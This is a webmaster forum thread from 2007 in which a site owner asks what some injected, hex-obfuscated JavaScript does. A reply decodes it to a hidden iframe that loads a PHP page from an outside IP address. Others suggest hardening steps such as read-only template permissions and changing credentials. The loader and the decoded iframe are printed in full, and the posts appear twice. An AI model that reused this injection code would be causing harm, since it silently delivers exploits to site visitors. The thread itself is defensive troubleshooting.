One of my sites hacked, question about code - GoFuckYourself.com

Global-X · 12-13-2007, 03:10 PM

So I just found out someone managed to add some javascript/exploit to one of my sites. No idea yet how they got in, site is running on smartthumbs/atx, all other sites on the server are fine.

Anyone got an idea what this code is doing :

<script> var s='3C696672616D65207372633D22687474703A2F2F3139352 E352E3131362E3235302F65782F7374617469632E706870222 077696474683D32206865696768743D32207374796C653D226 46973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>

High Class Grass · 12-13-2007, 03:13 PM

nothing to worry about, ur just paranoid

Global-X · 12-13-2007, 03:15 PM

Quote:

Originally Posted by High Class Grass

nothing to worry about, ur just paranoid

You smoke too much

Nookster · 12-13-2007, 03:15 PM

Let me throw a wild guess into the wind. Hosting at webair?? LOL

Global-X · 12-13-2007, 03:20 PM

Quote:

Originally Posted by Nookster

Let me throw a wild guess into the wind. Hosting at webair?? LOL

This server is with webair yes, please explain, I just reset my ftp password

Nookster · 12-13-2007, 03:23 PM

Quote:

Originally Posted by Global-X

This server is with webair yes, please explain, I just reset my ftp password

Get a more reliable host. I've noticed patterns developing with webair and that "mystical" javascript code showing up magically in the headers of sites hosted on webair. Something is being exploited within the webair administration interface for sure. Just don't know what.

Global-X · 12-13-2007, 03:31 PM

Quote:

Originally Posted by Nookster

Get a more reliable host. I've noticed patterns developing with webair and that "mystical" javascript code showing up magically in the headers of sites hosted on webair. Something is being exploited within the webair administration interface for sure. Just don't know what.

It's true that I never experienced anything like this with my servers at nationalnet or phatservers but I though webair has a good reputation, lots of webmasters using them

pastafari · 12-14-2007, 02:47 AM

http://www.gofuckyourself.com/showthread.php?t=787142

Violetta · 12-14-2007, 02:55 AM

time to change your ftp login!

Global-X · 12-14-2007, 03:32 AM

Quote:

Originally Posted by Rockatansky

time to change your ftp login!

I wish it was that simple

boneless · 12-14-2007, 03:45 AM

since i keep my templates in comus and st set to 644 or 444 permissions i havent had any iframes added to my pages anymore.

drjones · 12-14-2007, 07:30 AM

The code writes this to your web pages:

<iframe src="http://195.5.116.250/ex/static.php" width=2 height=2 style="display:none"></iframe>

Quickdraw · 12-14-2007, 07:43 AM

Did you upgrade your ATX recently? They had a security update last week I believe.

miroz · 12-14-2007, 08:04 AM

read this: http://askdamage.com/t21776-p2-we-ne...urity-now.html

Global-X · 12-14-2007, 08:04 AM

Quote:

Originally Posted by drjones

The code writes this to your web pages:

<iframe src="http://195.5.116.250/ex/static.php" width=2 height=2 style="display:none"></iframe>

Thanks for the info

Global-X · 12-14-2007, 08:14 AM

Quote:

Originally Posted by miroz

read this: http://askdamage.com/t21776-p2-we-ne...urity-now.html

Hmmm......... seems I'm not the only one, chmodded my smart thumbs templates to 444 and until now I'm fine again

million · 12-14-2007, 08:40 AM

get another host, not going to promote mine here, but do yourself a favor and get out of that webair oversold crap

Global-X · 12-14-2007, 09:35 AM

Quote:

Originally Posted by million

get another host, not going to promote mine here, but do yourself a favor and get out of that webair oversold crap

What do you mean with oversold?? It's a dedicated server with zero downtime since 1 year+, so far I'm happy with them

monstergalleriesdotnet · 12-21-2007, 01:12 PM

bummpppppp

jo3 · 12-21-2007, 01:51 PM

this happened to one of my SSH accounts last week

TURN THAT SHIT OFF UNLESS YOU NEED IT

the script interprets out to an invisible iframe... go figure =/

again, secure your sites by turning off ssh and contact your host to see anymore information that can dig up for you and to protect it from happening in the future.

12-13-2007, 03:10 PM	#1
Global-X Confirmed User Join Date: Jan 2004 Location: The Netherlands Posts: 335	One of my sites hacked, question about code So I just found out someone managed to add some javascript/exploit to one of my sites. No idea yet how they got in, site is running on smartthumbs/atx, all other sites on the server are fine. Anyone got an idea what this code is doing : <script> var s='3C696672616D65207372633D22687474703A2F2F3139352 E352E3131362E3235302F65782F7374617469632E706870222 077696474683D32206865696768743D32207374796C653D226 46973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>

12-13-2007, 03:15 PM	#4
Nookster Confirmed IT Professional Industry Role: Join Date: Nov 2005 Location: Hollywood, CA Posts: 3,744	Let me throw a wild guess into the wind. Hosting at webair?? LOL __________________ The Best Affiliate Software, Ever.

12-14-2007, 02:55 AM	#9
Violetta Affiliate Join Date: Jul 2004 Posts: 28,735	time to change your ftp login! __________________ M&A Queen

12-14-2007, 03:45 AM	#11
boneless Confirmed User Industry Role: Join Date: Dec 2002 Location: in your head Posts: 3,625	since i keep my templates in comus and st set to 644 or 444 permissions i havent had any iframes added to my pages anymore. __________________ icq:148573096 skype:dabone2 email:boneless(a)mgpteam(.)com

12-14-2007, 07:30 AM	#12
drjones Confirmed User Join Date: Oct 2005 Location: Charlotte, NC Posts: 908	The code writes this to your web pages: <iframe src="http://195.5.116.250/ex/static.php" width=2 height=2 style="display:none"></iframe> __________________ ICQ: 284903372

12-13-2007, 03:13 PM	#2
High Class Grass So Fucking Banned Join Date: Jan 2007 Posts: 103	nothing to worry about, ur just paranoid

12-14-2007, 02:47 AM	#8
pastafari Confirmed User Join Date: Jan 2006 Location: Ouagadougou , Burkina Faso Posts: 112	http://www.gofuckyourself.com/showthread.php?t=787142

12-14-2007, 07:43 AM	#13
Quickdraw Confirmed User Join Date: Mar 2004 Location: → → → Posts: 1,717	Did you upgrade your ATX recently? They had a security update last week I believe.

12-14-2007, 08:04 AM	#14
miroz Confirmed User Join Date: Aug 2006 Posts: 387	read this: http://askdamage.com/t21776-p2-we-ne...urity-now.html __________________ TommyPimp.com - my favorite celebrity program Buy traffic

12-14-2007, 08:40 AM	#17
million Confirmed User Join Date: Apr 2006 Location: Pornyland Posts: 789	get another host, not going to promote mine here, but do yourself a favor and get out of that webair oversold crap __________________ <sig spot goes here>

12-21-2007, 01:12 PM	#19
monstergalleriesdotnet So Fucking Banned Join Date: Sep 2007 Posts: 254	bummpppppp

12-21-2007, 01:51 PM	#20
jo3 Confirmed User Join Date: Nov 2003 Posts: 876	this happened to one of my SSH accounts last week TURN THAT SHIT OFF UNLESS YOU NEED IT the script interprets out to an invisible iframe... go figure =/ again, secure your sites by turning off ssh and contact your host to see anymore information that can dig up for you and to protect it from happening in the future. __________________ //porn-oh network